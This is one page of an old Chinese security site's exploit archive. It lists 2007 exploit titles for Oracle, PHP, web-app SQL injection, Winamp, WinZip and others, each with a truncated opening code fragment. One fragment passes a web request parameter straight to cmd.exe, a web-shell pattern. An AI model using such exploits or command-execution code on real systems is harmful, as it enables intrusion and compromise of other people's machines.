首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
Oracle 10g (PROCESS_DUP_HANDLE) Local Privilege Elevation (win32)
  日期:2007-03-12 13:35:41 点击:122 评论:0
// Argeniss - Information Security // // Oracle Database local elevation of privileges PoC exploit // // Author: Cesar Cerrudo #include windows.h #include stdio.h BOOL InjectShellcode(DWORD oldEIP,CHAR * oSID) { HMODULE hKernel; FARPROC pCreateProc;
PostNuke Module phgstats 0.5 (phgdir) Remote File Include Exploit
  日期:2007-03-12 13:34:33 点击:72 评论:0
#PostNuke Module phgstats 0.5 (phgdir) Remote File Include Exploit # #Vendor: http://kent.dl.sourceforge.net/sourceforge/phgstats/phgstats_0.5.zip # #Vulnerable Code: include_once($phgdir . 'settings/config.inc.php'); # #Coded by bd0rk || SOH-Crew #
JobSitePro 1.0 (search.php) Remote SQL Injection Exploit
  日期:2007-03-12 13:29:22 点击:53 评论:0
//'=============================================================================================== //'[Script Name: JobSitePro 1.0 (search.php) Remote BLIND SQL Injection Exploit //'[Coded by : ajann //'[Author : ajann //'[Contact : :( //'[S.Page : h
Top Auction 1.0 (viewcat.php) Remote SQL Injection Exploit
  日期:2007-03-12 13:27:57 点击:45 评论:0
#!/usr/bin/perl #[Script Name: Top Auction 1.0 (viewcat.php) Remote Blind SQL Injection Exploit #[Coded by : ajann #[Author : ajann #[Contact : :( #[S.Page : http://www.phplabs.com #[$$ : 39.95$ #[.. : ajann,Turkey use IO::Socket; if(@ARGV 1){ print
SonicMailer Pro <= 3.2.3 (index.php) Remote SQL Injection Exploit
  日期:2007-03-12 13:24:11 点击:63 评论:0
#!/usr/bin/perl #[Script Name: SonicMailer Pro = 3.2.3 (index.php) Remote Blind SQL Injection Exploit #[Coded by : ajann #[Author : ajann #[Contact : :( #[S.Page : http://www.triexa.com #[$$ : Standart License 89$ #[.. : ajann,Turkey use IO::Socket;
NukeSentinel <= 2.5.06 (mysql >= 4.0.24) Remote SQL Injection Exploit
  日期:2007-03-12 13:17:39 点击:87 评论:0
#!/usr/bin/php ?php error_reporting(E_ALL ^ E_NOTICE); if($argc 3) { print( -- NukeSentinel = 2.5.06 SQL Injection (mysql = 4.0.24) Exploit --- ----------------------------------------------------------------------- PHP conditions: none CMS condition
Snort 2.6.1.1/2.6.1.2/2.7.0 (fragementation) Remote DoS Exploit
  日期:2007-03-09 12:25:43 点击:243 评论:0
/********************************************************* * DOS Snort Inline * Affected Versions: 2.6.1.1, 2.6.1.2, 2.7.0(beta) * Requirements : Frag3 Enabled, Inline, Linux, ip_conntrack disabled * Antimatt3r * antimatter@gmail.com * Offset needs t
Rediff Toolbar ActiveX Control Remote Denial of Service Exploit
  日期:2007-03-09 12:24:31 点击:45 评论:0
!-- Rediff Toolbar ActiveX Control Remote DOS Vulnerability By Umesh Wanve (umesh_345@yahoo.com) Reference: http://www.securityfocus.com/bid/21924 Date: 08- Jan - 2007 // CLSID: {12F02779-6D88-4958-8AD3-83C12D86ADC7} // Info: Rediff Toolbar // ProgID
TFTPDWIN Server 0.4.2 (UDP) Denial of Service Exploit
  日期:2007-03-09 12:23:11 点击:50 评论:0
#!/usr/bin/perl # # TFTPDWIN Server UDP DOS 0.4.2 POC # written By : Umesh Wanve (umesh_345@yahoo.com) # #------------------------------------------------------------------------------- # TFTPDWIN Server is a Freeware TFTP server for Windows 9x/NT/XP
PHP 4.4.6 crack_opendict() Local Buffer Overflow Exploit PoC
  日期:2007-03-09 12:21:37 点击:62 评论:0
?php //PHP 4.4.6 crack_opendict() local buffer overflow poc exploit //win2k sp3 version / seh overwrite method //to be launched from the cli // by rgod // site: http://retrogod.altervista.org if (!extension_loaded(crack)){ die(you need the crack exte
Adobe Reader plug-in AcroPDF.dll 8.0.0.0 Resource Consumption
  日期:2007-03-09 12:20:01 点击:260 评论:0
!-------------------------------------------------------------------------------- Adobe PDF Reader plug-in AcroPDF.dll ver. 8.0.0.0 Resource Consumption author: shinnai mail: shinnai[at]autistici[dot]org site: http://www.shinnai.altervista.org Well,
PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit
  日期:2007-03-08 19:13:19 点击:56 评论:0
?php //PHP COM extensions (inconsistent Win32) safe_mode bypass //by rgod $____suntzu = new COM(WScript.Shell); $____suntzu-Run('c:windowssystem32cmd.exe /c '.escapeshellarg($_GET[cmd]).' '.dirname($_SERVER[SCRIPT_FILENAME]).'/suntzoi.txt'); $____
PHP < 4.4.5 / 5.2.1 (shmop) SSL RSA Private-Key Disclosure Exploit
  日期:2007-03-08 19:12:40 点击:58 评论:0
?php //////////////////////////////////////////////////////////////////////// // _ _ _ _ ___ _ _ ___ // // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ | || || _ // // | __ |/ _` || '_|/ _` |/ -_)| ' / -_)/ _` ||___|| _/| __ || _/ // // |_||_
PHP < 4.4.5 / 5.2.1 (shmop Functions) Local Code Execution Exploit
  日期:2007-03-08 19:11:57 点击:68 评论:0
?php //////////////////////////////////////////////////////////////////////// // _ _ _ _ ___ _ _ ___ // // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ | || || _ // // | __ |/ _` || '_|/ _` |/ -_)| ' / -_)/ _` ||___|| _/| __ || _/ // // |_||_
PHP <= 5.2.1 substr_compare() Information Leak Exploit
  日期:2007-03-08 19:11:09 点击:58 评论:0
?php //////////////////////////////////////////////////////////////////////// // _ _ _ _ ___ _ _ ___ // // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ | || || _ // // | __ |/ _` || '_|/ _` |/ -_)| ' / -_)/ _` ||___|| _/| __ || _/ // // |_||_
Winamp <= 5.12 (Crafted PLS) Remote Buffer Overflow Exploit (perl)
  日期:2007-03-08 19:10:22 点击:45 评论:0
#!/usr/bin/perl -w # =============================================================================================== # Winamp 5.12 Playlist UNC Path Computer Name Overflow Perl Exploit # By Umesh Wanve (umesh_345@yahoo.com) # ========================
Macromedia 10.1.4.20 SwDir.dll Internet Explorer Stack Overflow DoS
  日期:2007-03-08 19:09:20 点击:119 评论:0
pre codespan style=font: 10pt Courier New;span class=general1-symbol----------------------------------------------------------------------------- Macromedia SwDir.dll ver. 10.1.4.20 multiple methods Stack Overflow author: shinnai mail: shinnai[at]aut
WinZip <= 10.0.7245 FileView ActiveX Buffer Overflow Exploit v2
  日期:2007-03-07 13:06:33 点击:51 评论:0
!-- prdelka http://blogs.23.nu/prdelka I made a version of my winzip exploit that utilises the heap spray method with a bindshell for some project or other. you can download a copy here if its of use to you, note i used a different method courtesy of
Mercury/32 Mail Server <= 4.01b (check) Buffer Overflow Exploit PoC
  日期:2007-03-07 13:04:46 点击:69 评论:0
#!/usr/bin/perl # # mercurypown-v1.pl # # Mercury/32 v4.01b (win32) remote exploit # by mu-b - 28 Nov 2006 # # - Tested on: Mercury/32 v4.01a (win32) # Mercury/32 v4.01b (win32) # # Stack-based buffer overflow caused by Mercury/32 concatenating # con
PHP <= 4.4.6 mssql_[p]connect() Local Buffer Overflow Exploit
  日期:2007-03-06 13:29:26 点击:58 评论:0
?php // PHP = 4.4.6 mssql_connect() mssql_pconnect() local buffer overflow // poc exploit (and safe_mode bypass) // windows 2000 sp3 en / seh overwrite // by rgod // site: http://retrogod.altervista.org // u can easily adjust for php5 // this as my l
共637页/12733条记录 首页 上一页 [557] [558] [559] 560 [561] [562] [563] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved